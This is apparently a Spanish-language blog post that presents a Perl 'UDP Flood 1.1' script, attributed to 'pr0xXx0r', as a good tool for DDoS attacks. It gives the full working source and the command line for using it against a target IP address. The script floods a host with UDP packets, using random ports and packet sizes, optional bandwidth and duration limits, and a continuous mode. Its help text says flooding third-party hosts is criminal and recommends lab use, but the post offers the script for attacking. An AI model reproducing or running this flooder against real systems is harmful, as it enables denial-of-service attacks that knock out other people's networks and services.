Bueno aqui les dejo este script para hacer ataque Ddos muy bueno.
El comando para usarlo es:
perl ddos.pl --port=dst-port --size=pkt-size --time=secs --bandwidth=kbps --delay=msec ip-address
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 | #!/usr/bin/perl ##################################################### # udp flood. ###################################################### use Socket; use strict; use Getopt::Long; use Time::HiRes qw( usleep gettimeofday ) ; our $port = 0; our $size = 0; our $time = 0; our $bw = 0; our $help = 0; our $delay= 0; GetOptions( "port=i" => \$port, # UDP port to use, numeric, 0=random "size=i" => \$size, # packet size, number, 0=random "bandwidth=i" => \$bw, # bandwidth to consume "time=i" => \$time, # time to run "delay=f"=> \$delay, # inter-packet delay "help|?" => \$help); # help my ($ip) = @ARGV; if ($help || !$ip) { print <<'EOL'; .:: [ By pr0xXx0r ] ::. -[ DDosS Perl v1.1 ]- ddos.pl --port=dst-port --size=pkt-size --time=secs --bandwidth=kbps --delay=msec ip-address Defaults: * random destination UDP ports are used unless --port is specified * random-sized packets are sent unless --size or --bandwidth is specified * flood is continuous unless --time is specified * flood is sent at line speed unless --bandwidth or --delay is specified Usage guidelines: --size parameter is ignored if both the --bandwidth and the --delay parameters are specified. Packet size is set to 256 bytes if the --bandwidth parameter is used without the --size parameter The specified packet size is the size of the IP datagram (including IP and UDP headers). Interface packet sizes might vary due to layer-2 encapsulation. Warnings and Disclaimers: Flooding third-party hosts or networks is commonly considered a criminal activity. Flooding your own hosts or networks is usually a bad idea Higher-performace flooding solutions should be used for stress/performance tests Use primarily in lab environments for QoS tests EOL exit(1); } if ($bw && $delay) { print "WARNING: computed packet size overwrites the --size parameter ignored\n"; $size = int($bw * $delay / 8); } elsif ($bw) { $delay = (8 * $size) / $bw; } $size = 256 if $bw && !$size; ($bw = int($size / $delay * 8)) if ($delay && $size); my ($iaddr,$endtime,$psize,$pport); $iaddr = inet_aton("$ip") or die "Cannot resolve hostname $ip\n"; $endtime = time() + ($time ? $time : 1000000); socket(flood, PF_INET, SOCK_DGRAM, 17); print "Flooding $ip " . ($port ? $port : "random") . " port with " . ($size ? "$size-byte" : "random size") . " packets" . ($time ? " for $time seconds" : "") . "\n"; print "Interpacket delay $delay msec\n" if $delay; print "total IP bandwidth $bw kbps\n" if $bw; print "Break with Ctrl-C\n" unless $time; die "Invalid packet size requested: $size\n" if $size && ($size < 64 || $size > 1500); $size -= 28 if $size; for (;time() <= $endtime;) { $psize = $size ? $size : int(rand(1024-64)+64) ; $pport = $port ? $port : int(rand(65500))+1; send(flood, pack("a$psize","flood"), 0, pack_sockaddr_in($pport, $iaddr)); usleep(1000 * $delay) if $delay; } |
0 comentarios: sobre Script Perl UDP Flood 1.1 By pr0xXx0r
Publicar un comentario para Script Perl UDP Flood 1.1 By pr0xXx0r